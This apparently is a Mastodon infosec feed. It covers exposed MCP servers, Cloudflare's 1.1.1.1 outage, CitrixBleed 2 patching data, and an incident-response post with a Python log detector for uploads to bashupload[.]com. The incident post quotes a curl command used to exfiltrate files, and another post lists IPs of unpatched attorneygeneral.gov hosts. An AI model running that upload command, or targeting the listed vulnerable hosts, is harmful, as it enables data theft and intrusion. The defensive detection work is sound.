Pedro

@pedro@infosec.exchange

Exposing the Unseen: Mapping MCP Servers Across the Internet

"We identified a total of 1,862 MCP servers exposed to the internet. From this set, we manually verified a sample of 119. All 119 servers granted access to internal tool listings without authentication."

this is why I keep a very watchful eye on Knostic about AI stuff, they know the tech, the risks, *and* how human behavior will interact with them.

#infosec #cybersecurity #genai

https://www.knostic.ai/blog/mapping-mcp-servers-study


Knostic mapped 1,862 internet-exposed MCP servers via Shodan. 100 % lacked auth, revealing immature and risky GenAI endpoints.

This is what I think of every time I see Microsoft Co-Pilot mentioned:
@jacqueline
This would look so cute next to my "lipo pillow"

Good new SaaS vendor assessment question I’ve been using…

What is your process for updating your customer facing status page in the event of an incident?

You will learn so much from this, including…

- do they even have a status page
- if they do, do they know how to work it
- if it's managed by the engineering side of the house or marketing, which can give you clues as to what is important in their org culture
- how transparent they are willing to be about a topic that actually isn’t all that sensitive in the grand scheme of all the things you could ask about

#infosec

Here’s the @Cloudflare write-up with a description of what caused the outage. It was caused by an internal error not a BGP hijack, but we already knew that.

https://blog.cloudflare.com/cloudflare-1-1-1-1-incident-on-july-14-2025/

Cloudflare 1.1.1.1 Incident on July 14, 2025

On July 14th, 2025, Cloudflare made a change to our service topologies that caused an outage for 1.1.1.1 on the edge, resulting in downtime for 62 minutes for customers using the 1.1.1.1 public DNS Resolver as well as intermittent degradation of service for Gateway DNS. We’re deeply sorry for this outage. This outage was the result of an internal configuration error and not the result of an attack or a BGP hijack. In this blog post, we’re going to talk about what the failure was, why it occurred, and what we’re doing to make sure this doesn’t happen again.

The Cloudflare Blog

The Hyperpersonalized AI Slop Silo Machine Is Here

🔗 https://www.404media.co/the-ai-slop-niche-machine-is-here/


We are on a path to where social media will feed you hyperpersonalized AI slop about anything and everything.

404 Media

New CitrixBleed 2 scan data:

https://raw.githubusercontent.com/GossiTheDog/scanning/refs/heads/main/CVE-2025-5777-CitrixBleed2-ElectricBoogaloo-patching.txt

+7000 extra hosts added this round, host list is so large you need to use the raw view to see it.

Next set of data publication likely Friday, a month since the patch became available.

3832 orgs/hosts still unpatched.

Just to clear up some misinfo circulating, a BGP hijack was not the cause of Cloudflare DNS going down today.

At 21:51 UTC, Cloudflare (AS13335) withdrew both 1.1.1.0/24 and 1.0.0.0/24 for an unknown reason.

I suspect AS4755 was always announcing 1.1.1.0/24, when CF went away, it leaked a bit (i.e. "%2").

https://infosec.exchange/@GossiTheDog@cyberplace.social/114854023690856642

Infosec Exchange

207.218.103.174,*.attorneygeneral.gov|attorneygeneral.gov,13.1-52.19,VULNERABLE
207.218.103.19,*.attorneygeneral.gov|attorneygeneral.gov,13.1-52.19,VULNERABLE

If anybody knows anybody at the USG these are still unpatched today and getting owned still.

https://beta.shodan.io/host/207.218.103.19

https://beta.shodan.io/host/207.218.103.174

During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command:
curl bashupload[.]com -T your_file.txt

Notably, Palo Alto highlighted this service in a February report, stating:

"The threat actor stored some of the web shells on bashupload[.]com and downloaded and decoded them using certutil." [1]

Given its use in malicious activity, bashupload[.]com is a domain you may want to consider blocking and/or setting up alerts for any network connections.

[1] https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/
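As an added example (not part of the post above or of the Palo Alto report), here is a small Python checker that applies the post's "block and/or alert" suggestion to constructed proxy-log lines: any connection to bashupload.com is flagged, and PUT/POST requests (curl -T issues an HTTP PUT) are rated higher as likely uploads. The log format and the sample lines are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Indicator from the post. Defanged "[.]" notation is normalised so a list
# pasted from a report can be used as-is.
BLOCKED_DOMAINS = {"bashupload[.]com"}

# Constructed proxy-log format (an assumption, not any vendor's format):
#   <ts> <client_ip> <METHOD> <url-or-host:port> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

@dataclass
class Alert:
    ts: str
    client: str
    host: str
    method: str
    severity: str

def normalise_domain(d: str) -> str:
    return d.replace("[.]", ".").strip().lower().rstrip(".")

def host_from_url(url: str) -> str:
    # CONNECT lines carry "host:port" with no scheme; add "//" so urlsplit
    # treats it as a netloc rather than a scheme.
    if "://" not in url:
        url = "//" + url
    return urlsplit(url).hostname or ""

def host_matches(host: str, blocked=BLOCKED_DOMAINS) -> bool:
    host = normalise_domain(host)
    return any(host == b or host.endswith("." + b)
               for b in map(normalise_domain, blocked))

def scan_proxy_log(lines, blocked=BLOCKED_DOMAINS):
    """Return one Alert per log line that touches a blocked domain."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        host = host_from_url(m["url"])
        if not host_matches(host, blocked):
            continue
        # Upload-style methods are the exfiltration pattern the post describes.
        severity = "high" if m["method"] in ("PUT", "POST") else "medium"
        alerts.append(Alert(m["ts"], m["client"], host, m["method"], severity))
    return alerts

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '2025-07-15T03:12:41Z 10.20.4.17 GET https://www.example.org/ 200 "Mozilla/5.0"',
    '2025-07-15T03:13:02Z 10.20.4.17 CONNECT bashupload.com:443 200 "curl/8.5.0"',
    '2025-07-15T03:13:03Z 10.20.4.17 PUT https://bashupload.com/your_file.txt 200 "curl/8.5.0"',
    '2025-07-15T03:14:10Z 10.20.7.3 GET https://bashupload.com/abcd1234 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for a in scan_proxy_log(SAMPLE_LOG):
        print(f"{a.severity:6} {a.ts} {a.client} {a.method} {a.host}")
```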